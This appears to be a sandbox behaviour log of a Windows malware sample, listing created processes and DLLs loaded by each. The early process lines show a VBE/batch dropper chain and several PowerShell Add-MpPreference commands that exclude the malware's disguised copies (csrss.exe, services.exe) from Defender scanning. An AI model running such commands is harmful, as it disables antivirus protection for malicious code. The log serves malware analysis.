Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe"
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: mscoree.dll
Source: C:\portintosvc\driverInto.exe Section loaded: apphelp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: kernel.appcore.dll
Source: C:\portintosvc\driverInto.exe Section loaded: version.dll
Source: C:\portintosvc\driverInto.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\portintosvc\driverInto.exe Section loaded: uxtheme.dll
Source: C:\portintosvc\driverInto.exe Section loaded: windows.storage.dll
Source: C:\portintosvc\driverInto.exe Section loaded: wldp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: profapi.dll
Source: C:\portintosvc\driverInto.exe Section loaded: cryptsp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: rsaenh.dll
Source: C:\portintosvc\driverInto.exe Section loaded: cryptbase.dll
Source: C:\portintosvc\driverInto.exe Section loaded: sspicli.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ktmw32.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ntmarta.dll
Source: C:\portintosvc\driverInto.exe Section loaded: rasapi32.dll
Source: C:\portintosvc\driverInto.exe Section loaded: rasman.dll
Source: C:\portintosvc\driverInto.exe Section loaded: rtutils.dll
Source: C:\portintosvc\driverInto.exe Section loaded: mswsock.dll
Source: C:\portintosvc\driverInto.exe Section loaded: winhttp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\portintosvc\driverInto.exe Section loaded: iphlpapi.dll
Source: C:\portintosvc\driverInto.exe Section loaded: dhcpcsvc6.dll
Source: C:\portintosvc\driverInto.exe Section loaded: dhcpcsvc.dll
Source: C:\portintosvc\driverInto.exe Section loaded: dnsapi.dll
Source: C:\portintosvc\driverInto.exe Section loaded: winnsi.dll
Source: C:\portintosvc\driverInto.exe Section loaded: rasadhlp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: fwpuclnt.dll
Source: C:\portintosvc\driverInto.exe Section loaded: secur32.dll
Source: C:\portintosvc\driverInto.exe Section loaded: schannel.dll
Source: C:\portintosvc\driverInto.exe Section loaded: mskeyprotect.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ntasn1.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ncrypt.dll
Source: C:\portintosvc\driverInto.exe Section loaded: ncryptsslp.dll
Source: C:\portintosvc\driverInto.exe Section loaded: msasn1.dll
Source: C:\portintosvc\driverInto.exe Section loaded: gpapi.dll
Source: C:\portintosvc\driverInto.exe Section loaded: windowscodecs.dll
Source: C:\portintosvc\driverInto.exe Section loaded: propsys.dll
Source: C:\portintosvc\driverInto.exe Section loaded: dlnashext.dll
Source: C:\portintosvc\driverInto.exe Section loaded: wpdshext.dll
Source: C:\portintosvc\driverInto.exe Section loaded: edputil.dll
Source: C:\portintosvc\driverInto.exe Section loaded: urlmon.dll
Source: C:\portintosvc\driverInto.exe Section loaded: iertutil.dll
Source: C:\portintosvc\driverInto.exe Section loaded: srvcli.dll
Source: C:\portintosvc\driverInto.exe Section loaded: netutils.dll
Source: C:\portintosvc\driverInto.exe Section loaded: windows.staterepositoryps.dll
Source: C:\portintosvc\driverInto.exe Section loaded: wintypes.dll
Source: C:\portintosvc\driverInto.exe Section loaded: appresolver.dll
Source: C:\portintosvc\driverInto.exe Section loaded: bcp47langs.dll
Source: C:\portintosvc\driverInto.exe Section loaded: slc.dll
Source: C:\portintosvc\driverInto.exe Section loaded: userenv.dll
Source: C:\portintosvc\driverInto.exe Section loaded: sppc.dll
Source: C:\portintosvc\driverInto.exe Section loaded: onecorecommonproxystub.dll
Source: C:\portintosvc\driverInto.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
